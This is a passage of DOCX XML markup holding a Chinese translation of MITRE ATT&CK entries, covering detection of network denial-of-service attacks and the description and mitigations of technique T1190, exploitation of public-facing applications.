              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Internet</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务提供商（</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ISP</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>第三方（例如</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>DN</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）或专门从事</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>DoS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>缓解的提供商提供。根据洪泛数据量，可通过阻止源地址发起攻击、阻止目标端口或阻止用于传输的协议来进行内部过滤。由于即时响应可能需要第三方的快速参与，分析网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>D</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>oS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>影响的关键资源的相关风险</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>并制定容灾计划</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>业务连续性计划。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="789C6E33" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="001810EF">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="243C9D6E" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="001810EF">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44704506" w14:textId="77777777" w:rsidR="001810EF" w:rsidRPr="00A65911" w:rsidRDefault="001810EF" w:rsidP="001810EF">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有时可以在网络</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>oS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击效果足以对服务的可用性造成重大影响之前就检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>的存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但通常需要非常积极的监控和灵敏度，或者上游网络服务提供商所提供的服务。可使用典型的网络吞吐量监控工具（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>netflow</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>SNMP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和自定义脚本）来检测网络或服务利用率的突然增加。对网络流量的实时、自动化和定性研究可以识别某种协议中的流量突然激增，可以用于在网络</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>oS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击开始时就检测到它。然后，可以使用上述分析工具来确定导致中断的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击类型，并帮助进行补救。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2D8412" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="004F176D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>面向</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>公众</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>应用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的利用</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="1D7C1FDD" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3330AE9C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1190</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DA76B1D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t>初始访问</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AC52C93" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="094BD2C1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络抓包</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>日志，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>web</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>应用防火墙日志，应用日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CE0F74D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3DDF216D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="341218A8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>面向</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>公众应用的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用指的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>利用面向</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的计算机系统或程序的弱点</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用软件、数据或命令来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>造成</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>意外行为。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>弱点可能是缺陷、故障或设计漏洞。这些应用通常是网站，但</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可以包括数据库（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>），标准服务（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>），以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任何</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>带有可通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>访问的开放套接字的应用（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>服务器和相关服务）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>面向</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>公众应用的利用可能包括防御逃逸</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目的的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，具体</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>取决于被利用的弱点。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3548B881" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:lastRenderedPageBreak/>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>（开放式</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>应用程序安全项目）前</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>名和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>CWE</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>（</w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:tooltip="通用缺陷列表" w:history="1">
        <w:r w:rsidRPr="00671A0D">
          <w:t>通用缺陷列表</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00671A0D">
        <w:t>）前</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>25</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>名</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>突出显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>了网站和数据库最常见的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DAEDAD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="005C4554" w14:paraId="657C5964" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="06DCE443" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005C4554" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="632D8CB8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005C4554" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="661A3C3C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E7E3667" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>应用隔离和沙箱</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AFA0EE4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>隔离</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>应用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来限制利用目标访问其他进程和系统功能。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="6C491DAB" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1785A9EF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>漏洞利用防护</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DD4EB05" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>w</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>eb</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用防火墙来限制应用暴露，从而防止应用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>漏洞攻击</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="13E164D0" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C0416E4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>网络分区</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53EF06B6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将对外</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>服务器</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>服务</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>与</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>网络上其余部分分开，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>把对外</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>服务器</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>服务部署在</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>DMZ</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或使用单独的托管基础架构。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="6955B73A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48E53A3B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>特权账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CF7CBE4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>赋予服务账号最小权限，限制被利用进程从系统其余部分获得权限。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="0C2CA449" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18631E44" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>软件更新</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D8CC349" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>定期扫描对外系统是否存在漏洞并确立</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>快速</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>修复</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>步骤，以便扫描和公开披露过程中发现关键漏洞时快速打补丁。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="40907A4E" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27A7330D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>漏洞扫描</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
